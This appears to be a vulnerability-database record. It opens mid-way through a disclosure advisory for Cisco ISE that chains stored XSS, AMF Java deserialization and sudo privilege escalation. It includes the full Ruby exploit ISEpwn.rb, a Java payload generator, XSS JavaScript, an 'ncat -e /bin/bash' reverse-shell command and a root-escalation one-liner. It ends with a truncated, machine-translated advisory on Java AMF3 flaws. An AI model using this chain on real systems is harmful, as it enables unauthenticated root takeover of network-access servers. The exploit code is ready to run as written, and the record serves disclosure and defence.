policy, we request do not request a CVE assignment for issue with a Severity Impact Rating (SIR) lower than Medium. This issue will be fixed in the upcoming ISE release\". \r\nAt the time of the latest update, Cisco still recommends version 2.4.0.357 - affected by all the vulnerabilities in this advisory - as the \"Suggested Release\" in their software download page.\r\n\r\nThese actions show Cisco is incredibly negligent with regards to the security of their customers. They are still shipping (and recommending) a product version vulnerable to unauthenticated remote code execution, with a fully working public exploit and no way to track fixes or fixed versions for these vulnerabilities.\r\n\r\nAgile Information Security would like to thank Beyond Security's SSD Secure Disclosure programme for helping us disclose these vulnerabilities to Cisco, and publishing the advisory on their site [5].\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: Stored Cross Site Scripting\r\nCVE-2018-15440\r\nAttack Vector: Remote\r\nConstraints: None; exploitable by an unauthenticated attacker\r\nAffected versions: confirmed on ISE virtual appliance v2.4.0.357\r\n\r\nThe LiveLogSettingsServlet, available at /admin/LiveLogSettingsServlet, contains a stored cross site scripting vulnerability.\r\nThe doGet() HTTP request handler takes in an Action parameter as a HTTP query variable, which can be \"read\" or \"write\". \r\nWith the \"write\" parameter, it calls the writeLiveLogSettings() function which then takes several query string variables, such as Columns, Rows, Refresh_rate and Time_period.\r\nThe content of these query string variables is then written to /opt/CSCOcpm/mnt/dashboard/liveAuthProps.txt, and the server responds with a 200 OK. These parameters are not validated, and can contain any text.\r\n\r\nWhen the Action parameter equals \"read\", the servlet will read the /opt/CSCOcpm/mnt/dashboard/liveAuthProps.txt file and display it back to the user with the Content-Type \"text/html\", causing whatever was written to that file to be rendered and executed by the browser.\r\n\r\nTo mount a simple attack, we can send the following request:\r\nGET /admin/LiveLogSettingsServlet?Action=write&Columns=1&Rows=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e&Refresh_rate=1337&Time_period=1337\r\n\r\nWhich can then be triggered with:\r\nGET /admin/LiveLogSettingsServlet?Action=read HTTP/1.1\r\n\r\nHTTP/1.1 200 OK\r\nContent-Type: text/html;charset=UTF-8\r\nContent-Length: 164\r\nServer: \r\n\r\n<Settings>\r\n<Columns>\r\n<Col>1</Col>\r\n</Columns>\r\n<Rows><script>alert(1)</script></Rows>\r\n<Refresh_rate>1337</Refresh_rate>\r\n<Time_period>1337</Time_period>\r\n</Settings>\r\n\r\nThis vulnerability can be exploited by an unauthenticated attacker.\r\n\r\n\r\n#2\r\nVulnerability: Unsafe Flex AMF Java Object Deserialization\r\nCVE-2017-5641; Please be aware this CVE is not specific to Cisco ISE\r\nAttack Vector: Remote\r\nConstraints: Requires authentication to the admin web interface\r\nAffected versions: confirmed on ISE virtual appliance v2.4.0.357\r\n\r\nBy sending an HTTP POST request with random data to /admin/messagebroker/amfsecure, the server will respond with a 200 OK and binary data that includes:\r\n ...Unsupported AMF version XXXXX...\r\n \r\nWhich indicates that the server has a Apache / Adobe Flex AMF (BlazeDS) endpoint at that location. The BlazeDS library version running on the server is 4.0.0.14931, which means it is vulnerable to CVE-2017-5641 [6], the description of which is stated below:\r\n\"Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default. During the deserialization process code is executed that for several known types has undesired side-effects. Other, unknown types may also exhibit such behaviors. One vector in the Java standard library exists that allows an attacker to trigger possibly further exploitable Java deserialization of untrusted data. Other known vectors in third party libraries can be used to trigger remote code execution.\"\r\n\r\nThis vulnerability was previously exploited in DrayTek VigorACS by Agile Information Security, as it can be seen in [7] and [8]. Please refer to that advisory and exploit, as well as [9], [10] and [11] for further details on this vulnerability.\r\n\r\nWe were able to re-use some of the exploit code in [7] from the VigorACS vulnerability to create a binary AMF payload that will execute on the server as the iseadminportal user (see Appendix A). \r\n\r\nThe the exploit chain works in the same way as the previous one:\r\na) sends an AMF binary payload to /admin/messagebroker/amfsecure as described in [10] to trigger a Java Remote Method Protocol (JRMP) call back to the attacker\r\nb) receives the JRMP connection with ysoserial's JRMP listener [12]\r\nc) calls ysoserial with the ROME payload, as a vulnerable version of Rome (1.0 RC2) is in the Java classpath of the server\r\nd) execute ncat (the binary is on the ISE virtual appliance) and return a reverse shell running as the iseaminportal user\r\n\r\nAppendix A contains the Java code used to generate the AMF payload that will be sent in step a). This code is very similar to the one in [10], and it is highly recommended to read that advisory by Markus Wulftange of Code White for a better understanding of this vulnerability.\r\n\r\nThis vulnerability can only be exploited by an authenticated attacker with access to the administrative portal.\r\n\r\n\r\n#3\r\nVulnerability: Privilege Escalation via Incorrect sudo File Permissions\r\nNo CVE assigned; track as SSD-3778\r\nAttack Vector: Local\r\nConstraints: Requires a command shell running as the iseadminportal user\r\nAffected versions: confirmed on ISE virtual appliance v2.4.0.357\r\n\r\nThe iseadminportal user can run a variety of commands as root via sudo (output of 'sudo -l'):\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/resetMntDb.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/resetMnTSessDir.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/setdbpw.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/sync_export.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/sync_import.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/partial_sync_export.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/partial_sync_import.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/partial_sync_cleanup.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/ttcontrol.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/updatewallet.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/log-list.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/file-info.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/delete-log-file.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/debug-log-config.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/showinv.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/isebackupcancel.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/nssutils.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/killsubnetscan.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/thirdpartyguestvlan.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/ise-3rdpty-guestvlan.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/mnt/bin/CheckDiskSpace.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/upgrade/bin/genbackup.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/upgrade/bin/createHCTOnPAPScript.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/upgrade/bin/backupHostConfigTablesOnPAP.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/upgrade/bin/dictionary_attribute_update.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/upgrade/bin/deleteguest.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/upgrade/bin/iseupgrade-dbexport.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/pxgrid_backup.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/pxgrid_restore.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/pxgrid_sync.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/pbis_monit.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/prrt/bin/FIPS_lockdown.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/iseupgradeui.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/show_iowait.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/kerberosprobe.sh *\r\n (root) NOPASSWD: /opt/CSCOcpm/bin/sxp-servercontrol.sh *\r\n...\r\n\r\nHowever all of the files above are writeable by the iseadminportal user. This makes it trivial to perform privilege escalation to root. All that is needed to do is to edit the files, and add a \"/bin/sh\" to the second and / or last line, then run the script as sudo to get a root shell.\r\n\r\n\r\n>> Exploitation summary:\r\nBy now you should have a decent idea of how to build a full exploit chain. Since vulnerability #2 (AMF RCE) can only be exploited by an authenticated administrator, we can set up a trap using vulnerability #1 (stored XSS) as an unauthenticated attacker.\r\n\r\nBy abusing the stored cross site scripting, we can create a malicious Javascript (see Appendix B) that will be stored in /admin/LiveLogSettingsServlet. If a logged in user visits that page the Javascript payload will send a XMLHttpRequest to /admin/messagebroker/amfsecure with the payload created by the Java code in Appendix A, and start the exploit described in vulnerability #2 (AMF RCE) to obtain a reverse shell as the iseadminuser.\r\n\r\nOnce we have the reverse shell, we can run the following command to abuse vulnerability #3 (privilege escalation):\r\npython -c 'import os;f=open(\"/opt/CSCOcpm/bin/file-info.sh\", \"a+\", 0);f.write(\"if [ \\\"$1\\\" == 1337 ];then\\n/bin/bash\\nfi\\n\");f.close();os.system(\"sudo /opt/CSCOcpm/bin/file-info.sh 1337\")'\r\n\r\nThis will add an \"if\" clause at the end of /opt/CSCOcpm/bin/file-info.sh that looks for the \"1337\" parameter, and executes /bin/bash as root when it sees it. That way we won't mess with any important system functionality that might use that file, and we will get our full root shell.\r\n\r\nThe full exploit, written in Ruby, is available in [2].\r\n\r\n\r\n>> Fix:\r\nCisco claims vulnerability #1 is fixed in version 2.2.0.913. It is unknown if it is fixed in versions 2.4.x (see [13], [14]).\r\nCisco claims vulnerability #2 is fixed in version 2.4.0.905 (see [3]).\r\nBy Cisco's own admission, vulnerability #3 is not fixed at the time of the latest update to this advisory (see [4]).\r\n\r\nPlease note that Agile Information Security does not verify any fixes, except when noted in the advisory or requested by the vendor. The vendor fixes might be ineffective or incomplete, and it is the vendor's responsibility to ensure the vulnerablities found by Agile Information Security are resolved properly.\r\n\r\n\r\n>> Appendix A (AMF payload generator in Java):\r\n===\r\nimport flex.messaging.io.amf.MessageBody;\r\nimport flex.messaging.io.amf.ActionMessage;\r\nimport flex.messaging.io.SerializationContext;\r\nimport flex.messaging.io.amf.AmfMessageSerializer;\r\nimport java.io.*;\r\n\r\npublic class ACSFlex {\r\n public static void main(String[] args) {\r\n Object unicastRef = generateUnicastRef(args[0], Integer.parseInt(args[1]));\r\n // serialize object to AMF message\r\n try {\r\n byte[] amf = new byte[0];\r\n amf = serialize((unicastRef));\r\n DataOutputStream os = new DataOutputStream(new FileOutputStream(args[2]));\r\n os.write(amf);\r\n System.out.println(\"Done, payload written to \" + args[2]);\r\n } catch (IOException e) {\r\n e.printStackTrace();\r\n }\r\n }\r\n\r\n public static Object generateUnicastRef(String host, int port) {\r\n java.rmi.server.ObjID objId = new java.rmi.server.ObjID();\r\n sun.rmi.transport.tcp.TCPEndpoint endpoint = new sun.rmi.transport.tcp.TCPEndpoint(host, port);\r\n sun.rmi.transport.LiveRef liveRef = new sun.rmi.transport.LiveRef(objId, endpoint, false);\r\n return new sun.rmi.server.UnicastRef(liveRef);\r\n }\r\n\r\n public static byte[] serialize(Object data) throws IOException {\r\n MessageBody body = new MessageBody();\r\n body.setData(data);\r\n\r\n ActionMessage message = new ActionMessage();\r\n message.addBody(body);\r\n\r\n ByteArrayOutputStream out = new ByteArrayOutputStream();\r\n\r\n AmfMessageSerializer serializer = new AmfMessageSerializer();\r\n serializer.initialize(SerializationContext.getSerializationContext(), out, null);\r\n serializer.writeMessage(message);\r\n\r\n return out.toByteArray();\r\n }\r\n}\r\n===\r\n\r\n\r\n>> Appendix B (Javascript code to be used in the stored XSS):\r\n===\r\n<script>\r\nfunction b64toBlob(b64Data, contentType, sliceSize) {\r\n contentType = contentType || '';\r\n sliceSize = sliceSize || 512;\r\n var byteCharacters = atob(b64Data);\r\n var byteArrays = [];\r\n for (var offset = 0; offset < byteCharacters.length; offset += sliceSize) {\r\n var slice = byteCharacters.slice(offset, offset + sliceSize);\r\n var byteNumbers = new Array(slice.length);\r\n for (var i = 0; i < slice.length; i++) {\r\n byteNumbers[i] = slice.charCodeAt(i);\r\n }\r\n var byteArray = new Uint8Array(byteNumbers);\r\n byteArrays.push(byteArray);\r\n }\r\n var blob = new Blob(byteArrays, {type: contentType});\r\n return blob;\r\n}\r\nb64_payload = 'cGlzc2FuZXNzZWN1';\r\nvar xhr = new XMLHttpRequest();\r\nxhr.open(\"POST\", 'https://10.10.10.44/admin/messagebroker/amfsecure', true);\r\nxhr.send(b64toBlob(b64_payload, 'application/x-amf')); \r\n</script>\r\n===\r\n\r\n\r\n>> References:\r\n[1] https://www.cisco.com/c/en/us/products/collateral/security/identity-services-engine/data_sheet_c78-656174.html\r\n[2] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/ISEpwn.rb\r\n[3] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvj62599\r\n[4] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCve49987\r\n[5] https://ssd-disclosure.com/index.php/archives/3778\r\n[6] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5641\r\n[7] https://github.com/pedrib/PoC/tree/master/exploits/acsPwn\r\n[8] https://raw.githubusercontent.com/pedrib/PoC/master/advisories/draytek-vigor-acs.txt\r\n[9] https://issues.apache.org/jira/browse/FLEX-35290\r\n[10] http://codewhitesec.blogspot.ru/2017/04/amf.html\r\n[11] https://github.com/mbechler/marshalsec\r\n[12] https://github.com/frohoff/ysoserial\r\n[13] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm79609\r\n[14] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190109-ise-multi-xss\r\n\r\n\r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business.\r\n\r\n\r\n----------------------------------------------------------------\r\n\r\n--- Exploit: ISEpwn.rb ---\r\n\r\n#!/usr/bin/ruby\r\n\r\n=begin\r\nExploit for Cisco Identify Services Engine (ISE), tested on version 2.4.0.357\r\nBy Pedro Ribeiro ([email\u00a0protected]) from Agile Information Security, \r\nand Dominik Czarnota ([email\u00a0protected])\r\n\r\nThis exploit starts by abusing a stored cross scripting to deploy malicious Javascript to /admin/LiveLogSettingsServlet (CVE-2018-15440).\r\nThe Javascript contains a binary payload that will cause a XHR request to the AMF endpoint on the ISE server, which is vulnerable to CVE-2017-5641 (Unsafe Java AMF deserialization), leading to remote code execution as the iseadminportal user.\r\nThis AMF deserialization can only be triggered by an authenticated user, hence why the stored XSS is necessary.\r\nThe exploit will wait until the server executes the AMF deserialization payload and spawn netcat to receive a reverse shell from the server.\r\nOnce we have code execution as the unprivileged iseadminportal user, we can edit various shell script files under /opt/CSCOcpm/bin/ and run them as sudo, escalating our privileges to root.\r\n\r\nThis exploit has only been tested in Linux. The two jars described below are required for execution of the exploit, and they should be in the same directory as this script.\r\n\r\n==\r\nysoserial.jar - get the latest version from https://github.com/frohoff/ysoserial/releases\r\nacsFlex.jar - build the following code as a JAR:\r\n\r\nimport flex.messaging.io.amf.MessageBody;\r\nimport flex.messaging.io.amf.ActionMessage;\r\nimport flex.messaging.io.SerializationContext;\r\nimport flex.messaging.io.amf.AmfMessageSerializer;\r\nimport java.io.*;\r\n\r\npublic class ACSFlex {\r\n public static void main(String[] args) {\r\n Object unicastRef = generateUnicastRef(args[0], Integer.parseInt(args[1]));\r\n // serialize object to AMF message\r\n try {\r\n byte[] amf = new byte[0];\r\n amf = serialize((unicastRef));\r\n DataOutputStream os = new DataOutputStream(new FileOutputStream(args[2]));\r\n os.write(amf);\r\n System.out.println(\"Done, payload written to \" + args[2]);\r\n } catch (IOException e) {\r\n e.printStackTrace();\r\n }\r\n }\r\n\r\n public static Object generateUnicastRef(String host, int port) {\r\n java.rmi.server.ObjID objId = new java.rmi.server.ObjID();\r\n sun.rmi.transport.tcp.TCPEndpoint endpoint = new sun.rmi.transport.tcp.TCPEndpoint(host, port);\r\n sun.rmi.transport.LiveRef liveRef = new sun.rmi.transport.LiveRef(objId, endpoint, false);\r\n return new sun.rmi.server.UnicastRef(liveRef);\r\n }\r\n\r\n public static byte[] serialize(Object data) throws IOException {\r\n MessageBody body = new MessageBody();\r\n body.setData(data);\r\n\r\n ActionMessage message = new ActionMessage();\r\n message.addBody(body);\r\n\r\n ByteArrayOutputStream out = new ByteArrayOutputStream();\r\n\r\n AmfMessageSerializer serializer = new AmfMessageSerializer();\r\n serializer.initialize(SerializationContext.getSerializationContext(), out, null);\r\n serializer.writeMessage(message);\r\n\r\n return out.toByteArray();\r\n }\r\n}\r\n=end\r\n\r\nrequire 'tmpdir'\r\nrequire 'net/http'\r\nrequire 'uri'\r\nrequire 'openssl'\r\nrequire 'base64'\r\n\r\nclass String\r\n def black; \"\\e[30m#{self}\\e[0m\" end\r\n def red; \"\\e[31m#{self}\\e[0m\" end\r\n def green; \"\\e[32m#{self}\\e[0m\" end\r\n def brown; \"\\e[33m#{self}\\e[0m\" end\r\n def blue; \"\\e[34m#{self}\\e[0m\" end\r\n def magenta; \"\\e[35m#{self}\\e[0m\" end\r\n def cyan; \"\\e[36m#{self}\\e[0m\" end\r\n def gray; \"\\e[37m#{self}\\e[0m\" end\r\n\r\n def bg_black; \"\\e[40m#{self}\\e[0m\" end\r\n def bg_red; \"\\e[41m#{self}\\e[0m\" end\r\n def bg_green; \"\\e[42m#{self}\\e[0m\" end\r\n def bg_brown; \"\\e[43m#{self}\\e[0m\" end\r\n def bg_blue; \"\\e[44m#{self}\\e[0m\" end\r\n def bg_magenta; \"\\e[45m#{self}\\e[0m\" end\r\n def bg_cyan; \"\\e[46m#{self}\\e[0m\" end\r\n def bg_gray; \"\\e[47m#{self}\\e[0m\" end\r\n\r\n def bold; \"\\e[1m#{self}\\e[22m\" end\r\n def italic; \"\\e[3m#{self}\\e[23m\" end\r\n def underline; \"\\e[4m#{self}\\e[24m\" end\r\n def blink; \"\\e[5m#{self}\\e[25m\" end\r\n def reverse_color; \"\\e[7m#{self}\\e[27m\" end\r\nend\r\n\r\nputs \"\"\r\nputs \"Cisco Identity Services Engine (ISE) remote code execution as root\".cyan.bold\r\nputs \"CVE-TODO\".cyan.bold\r\nputs \" Tested on ISE virtual appliance 2.4.0.357\".cyan.bold\r\nputs \"By:\".blue.bold \r\nputs \" Pedro Ribeiro ([email\u00a0protected]) / Agile Information Security\".blue.bold\r\nputs \" Dominik Czarnota ([email\u00a0protected])\".blue.bold\r\nputs \"\"\r\n\r\nscript_dir = File.expand_path(File.dirname(__FILE__))\r\nysoserial_jar = File.join(script_dir, 'ysoserial.jar')\r\nacsflex_jar = File.join(script_dir, 'acsFlex.jar')\r\n\r\nif (ARGV.length < 3) or not File.exist?(ysoserial_jar) or not File.exist?(acsflex_jar)\r\n puts \"Usage: ./ISEpwn.rb <rhost> <rport> <lhost>\".bold\r\n puts \"Spawns a reverse shell from rhost to lhost\"\r\n puts \"\"\r\n puts \"NOTES:\\tysoserial.jar and the included acsFlex.jar must be in this script's directory.\"\r\n puts \"\\tTwo random TCP ports in the range 10000-65535 are used to receive connections from the target.\"\r\n puts \"\"\r\n exit(-1)\r\nend\r\n\r\n# Unfortunately I couldn't find a better way to make this interactive,\r\n# so the user has to copy and paste the python command to write to the shell script \r\n# and execute as sudo.\r\n# Spent hours fighting with Ruby and trying to get this without user interaction,\r\n# hopefully some Ruby God can enlighten me on how to do it properly.\r\ndef start_nc_thread(nc_port, jrmp_pid)\r\n IO.popen(\"nc -lvkp #{nc_port.to_s} 2>&1\").each do |line|\r\n if line.include?('Connection from')\r\n Process.kill(\"TERM\", jrmp_pid)\r\n Process.wait(jrmp_pid)\r\n puts \"[+] Shelly is here! Now to escalate your privileges to root, \".green.bold +\r\n \"copy and paste the following:\".green.bold\r\n puts %{python -c 'import os;f=open(\"/opt/CSCOcpm/bin/file-info.sh\", \"a+\", 0);f.write(\"if [ \\\\\"$1\\\\\" == 1337 ];then\\\\n/bin/bash\\\\nfi\\\\n\");f.close();os.system(\"sudo /opt/CSCOcpm/bin/file-info.sh 1337\")'}\r\n puts \"[+] Press enter, then interact with the root shell,\".green.bold + \r\n \" and press CTRL + C when done\".green.bold\r\n else\r\n puts line\r\n end\r\n end\r\nend\r\n\r\nYSOSERIAL = \"#{ysoserial_jar} ysoserial.exploit.JRMPListener JRMP_PORT ROME\"\r\nJS_PAYLOAD = %{<script>function b64toBlob(e,r,a){r=r||\"\",a=a||512;for(var t=atob(e),n=[],o=0;o<t.length;o+=a){for(var l=t.slice(o,o+a),b=new Array(l.length),h=0;h<l.length;h++)b[h]=l.charCodeAt(h);var p=new Uint8Array(b);n.push(p)}return new Blob(n,{type:r})}b64_payload=\"<PAYLOAD>\";var xhr=new XMLHttpRequest;xhr.open(\"POST\",\"https://<RHOST>/admin/messagebroker/amfsecure\",!0),xhr.send(b64toBlob(b64_payload,\"application/x-amf\"));</script>}\r\n\r\nrhost = ARGV[0]\r\nrport = ARGV[1]\r\nlhost = ARGV[2].dup.force_encoding('ASCII')\r\n\r\nDir.mktmpdir { |temp_dir|\r\n\r\n nc_port = rand(10000..65535)\r\n puts \"[+] Picked port #{nc_port} to receive the shell\".cyan.bold\r\n \r\n # step 1: create the AMF payload\r\n puts \"[+] Creating AMF payload...\".green.bold\r\n jrmp_port = rand(10000..65535)\r\n\r\n amf_file = temp_dir + \"/payload.ser\"\r\n system(\"java -jar #{acsflex_jar} #{lhost} #{jrmp_port} #{amf_file}\")\r\n amf_payload = File.binread(amf_file)\r\n\r\n # step 2: start the ysoserial JRMP listener\r\n puts \"[+] Picked port #{jrmp_port} for the JRMP server\".cyan.bold\r\n \r\n # build the command line argument that will be executed by the server\r\n java = \"java -cp #{YSOSERIAL.gsub('JRMP_PORT', jrmp_port.to_s)}\"\r\n cmd = \"ncat -e /bin/bash SERVER PORT\".gsub(\"SERVER\", lhost).gsub(\"PORT\", nc_port.to_s)\r\n puts \"[+] Sending command #{cmd}\".green.bold\r\n\r\n java_split = java.split(' ') << cmd\r\n jrmp = IO.popen(java_split)\r\n jrmp_pid = jrmp.pid\r\n sleep 5\r\n\r\n # step 3: start the netcat reverse shell listener\r\n t = Thread.new{start_nc_thread(nc_port, jrmp_pid)}\r\n \r\n # step 4: fire the XSS payload and wait for our trap to be sprung\r\n js_payload = JS_PAYLOAD.gsub('<RHOST>', \"#{rhost}:#{rport}\").\r\n gsub('<PAYLOAD>', Base64.strict_encode64(amf_payload))\r\n uri = URI.parse(\"https://#{rhost}:#{rport}/admin/LiveLogSettingsServlet\")\r\n params = { \r\n :Action => \"write\", \r\n :Columns => rand(1..1000).to_s,\r\n :Rows => js_payload,\r\n :Refresh_rate => rand(1..1000).to_s,\r\n :Time_period => rand(1..1000).to_s\r\n }\r\n uri.query = URI.encode_www_form( params )\r\n\r\n Net::HTTP.start(uri.host, uri.port, \r\n {:use_ssl => true, :verify_mode => OpenSSL::SSL::VERIFY_NONE }) do |http|\r\n #http.set_debug_output($stdout)\r\n res = http.get(uri)\r\n end\r\n\r\n puts \"[+] XSS payload sent. Waiting for an admin to take the bait...\".green.bold\r\n begin\r\n t.join\r\n rescue Interrupt\r\n begin\r\n Process.kill(\"TERM\", jrmp_pid)\r\n Process.wait(jrmp_pid)\r\n rescue Errno::ESRCH\r\n # if we try to kill a dead process we get this error\r\n end \r\n puts \"Exiting...\"\r\n end\r\n}\r\nexit 0\n\n# 0day.today [2019-02-25] #", "sourceHref": "https://0day.today/exploit/32135", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "myhack58": [{"lastseen": "2017-04-07T03:19:44", "description": "! [](/Article/UploadPic/2017-4/201747105241805.jpg)\n\nRecently, a German security team [@codewhitesec ](<https://twitter.com/codewhitesec>)found a Java AMF3 plurality of functions to achieve vulnerability, the American CERT/CC also issued a safety warning. An attacker can remotely by tricking or controlling the service connection, in AMF3 reverse sequence operation when the execution of arbitrary code. Part of the affected products the patch has been released.\n\nAMF3 is actually the Adobe Action Message Format of the latest version, is used to ActionScript object graph to serialize in compressed binary format. AMF first appeared in 2001's Flash Player 6, and AMF3 is accompanied by Flash Player 9 appears.\n\nSerialization means that an object converted to a byte stream the process, so that the object is stored, or transmitted into memory or file. And the serialization of the data release process is the process of deserialization--this process if the process is not in place there will be significant safety issues.\n\nCERT/CC security Bulletin mentioned 3 a vulnerability, the first vulnerability allows an attacker to spoof or control RMI\uff08Remote Method Invocation server to execute the code. The second vulnerability can be exploited by attackers to achieve arbitrary code execution-the vulnerability affected the Flamingo, Apache Flex BlazeDS and GraniteDS it. XXE vulnerability also affects these products, in addition to the WebORB for. Details are as follows:\n\n## Vulnerability overview\n\nJava AMF3 function of the presence of unsafe deserialization and XML external entity injection vulnerability, resulting in multiple applications of the product affected, the vulnerability profile, see KB-CERT [VU#307983](<https://www.kb.cert.org/vuls/id/307983>), a detailed technical analysis see [codewhitesec blog](<https://codewhitesec.blogspot.kr/2017/04/amf.html> a).\n\n## Vulnerability description\n\n### Untrusted data deserialization vulnerability\n\nSome Java AMF3 deserialization is implemented not from the recommended specification for the class of the flash. utils. IExternalizable, but from java. io. Externalizable in a derived class instance. Therefore, the remote attacker can trick-or control is used to serialize Java objects RMI service connection, to achieve the deserialization operation when the execution of arbitrary code.\n\nSome Java AMF3 deserialization is not from the recommended specification for the class of the flash. utils. IExternalizable, but from java. io. Externalizable in a derived class instance. Therefore, the remote attacker can trick-or control is used to serialize Java objects RMI service connection, to achieve the deserialization operation when the execution of arbitrary code.\n\nAffected by the vulnerability of the product program and the CVE number is as follows:\n\nAtlassian JIRA, 4.2. 4 to 6. 3. 0 version \u2013 CVE-2017-5983 for\n\nFlamingo amf-serializer by Exadel, version 2.2.0 \u2013 CVE-2017-3201\n\nGraniteDS, 3.1.1. GA version \u2013 CVE-2017-3199\n\nPivotal/Spring spring-flex \u2013 CVE-2017-3203\n\nWebORB for Java by Midnight Coders, 5.1.1.0 version \u2013 CVE-2017-3207\n\nUse these library programs, other products may also be affected.\n\n### Dynamic managed code resource of an incorrect control vulnerability\n\nSome Java AMF3 deserialization is implemented by its public no-argument constructor to construct arbitrary instances of the class, or call any of the Java Beans setter methods. Vulnerability can be the use case depends on use of anti-serialization of the class path of the class in usability. A remote attacker can send pre-set the serialization of java objects, in order to deceive or control the manner in reverse sequence operation when the execution of arbitrary code.\n\nAffected by the vulnerability of the product program and the CVE number is as follows:\n\nFlamingo amf-serializer by Exadel, version 2.2.0 \u2013 CVE-2017-3202\n\nFlex BlazeDS , 4.6.0. 23207 version and the 4. 7. 2 versions \u2013 CVE-2017-5641\n\nGraniteDS, 3.1.1. GA version \u2013 CVE-2017-3200\n\nUse these library programs, other products may also be affected.\n\n### XML external entity references of unduly limit the vulnerability XXE vulnerability\n\nSome Java AMF3 deserialization is implemented to allow from AMF3 message is embedded in the XML file to perform an external entity reference, once the XML parsing error occurs in processing, it will leak the server to sensitive information, but also will lead to[DDoS](<http://www.myhack58.com/Article/60/sort096/Article_096_1.htm>), a SSRF-server side request forgery attacks.\n\nAffected by the vulnerability of the product program and the CVE number is as follows:\n\nFlex BlazeDS , 4.6.0.23207 version \u2013 CVE-2015-3269\n\nGraniteDS, 3.1.1. GA version \u2013 CVE-2016-2340 (see VU#279472)\n\nWebORB for Java by Midnight Coders, 5.1.1.0 version \u2013 CVE-2017-3208\n\nUse these library programs, other products may also be affected.\n\n## Vulnerability\n\nAn attacker can remotely by tricking or controlling the service connection, sending a serialized java object, in the reverse sequence operation when the execution of arbitrary code.\n\n## Solution\n\nProgram update to the latest version;\n\nApplication developers should use the newer version of the JDK programs, such as JDK 8 update 121, the JDK 7 update 131 and JDK 6 update 141 are included in the sequence of the blacklist filter, and the upcoming release of the [JDK9](<http://openjdk.java.net/projects/jdk9/>) is more secure;\n\nDevelopers should improve on Don't trust the source to deserialize the data the Security Alert; and\n\nConfigure firewall rules or file system restrictions.\n\n## Currently the affected vendor information\n\n! [](/Article/UploadPic/2017-4/201747105241674.jpg)\n\nPart of the library such as GraniteDS and Flamingo are no longer supported; and Atlassian and Apache it has been for their products released a patch. CERT/CC logo, HP, SonicWall and VMware products may also be affected.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-07T00:00:00", "type": "myhack58", "title": "Java AMF3 exposure remote code execution vulnerability-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3201", "CVE-2017-3200", "CVE-2017-5641", "CVE-2017-5983", "CVE-2016-2340", "CVE-2017-3199", "CVE-2015-3269", "CVE-2017-3208", "CVE-2017-3202", "CVE-2017-3207", "CVE-2017-3203"], "modified": "2017-04-07T00:00:00", "id": "MYHACK58:62201785037", "href": "http://www.myhack58.com/Article/html/3/62/2017/85037.htm", "sourceData": "", "cvss": {"score": 5.5, "vector": 